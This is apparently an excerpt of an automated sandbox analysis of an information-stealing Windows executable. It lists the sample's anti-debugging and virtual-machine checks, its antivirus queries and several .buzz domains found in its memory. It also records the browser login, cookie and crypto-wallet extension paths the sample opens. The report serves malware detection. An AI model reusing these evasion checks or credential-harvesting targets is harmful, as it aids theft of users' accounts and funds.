                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6BC802 second address: 6BC821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F909CBB3516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F909CBB351Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6BC821 second address: 6BC825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D1442 second address: 6D1446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D1446 second address: 6D144C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D144C second address: 6D1451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D15D1 second address: 6D15E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F909C7BD30Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D15E9 second address: 6D15ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D15ED second address: 6D160B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D160B second address: 6D1622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909CBB3521h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D6035 second address: 6D603B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D603B second address: 6D603F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6D636A second address: 6D636E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSpecial instruction interceptor: First address: 5E04C4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSpecial instruction interceptor: First address: 4386D1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSpecial instruction interceptor: First address: 66DBBF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe TID: 4820Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe TID: 3304Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: AaEBZ7icLd.exe, 00000000.00000002.2352086086.00000000005C2000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000002.2352761941.0000000001049000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.0000000005860000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: AaEBZ7icLd.exe, AaEBZ7icLd.exe, 00000000.00000003.2276687938.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277706743.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2279207879.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2278490614.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277354845.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277010991.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2278839639.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2276143171.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2279332488.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2279861456.0000000001084000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.0000000005860000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: AaEBZ7icLd.exe, 00000000.00000002.2352086086.00000000005C2000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: NTICE
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: SICE
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: hummskitnj.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: cashfuzysao.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: appliacnesot.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: screwamusresz.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: inherineau.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scentniej.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: rebuildeso.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: prisonyfork.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mindhandru.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000002.2352086086.00000000005C2000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: qProgram Manager
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: AaEBZ7icLd.exe, 00000000.00000003.2302025063.0000000001093000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2301994724.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2301830725.00000000010D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: AaEBZ7icLd.exe PID: 5632, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: AaEBZ7icLd.exe String found in binary or memory: Wallets/Electrum
                Source: AaEBZ7icLd.exe String found in binary or memory: Wallets/ElectronCash
                Source: AaEBZ7icLd.exe String found in binary or memory: Jaxx Liberty
                Source: AaEBZ7icLd.exe String found in binary or memory: window-state.json
                Source: AaEBZ7icLd.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: AaEBZ7icLd.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: AaEBZ7icLd.exe String found in binary or memory: Wallets/Ethereum
                Source: AaEBZ7icLd.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: AaEBZ7icLd.exe String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffffla
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
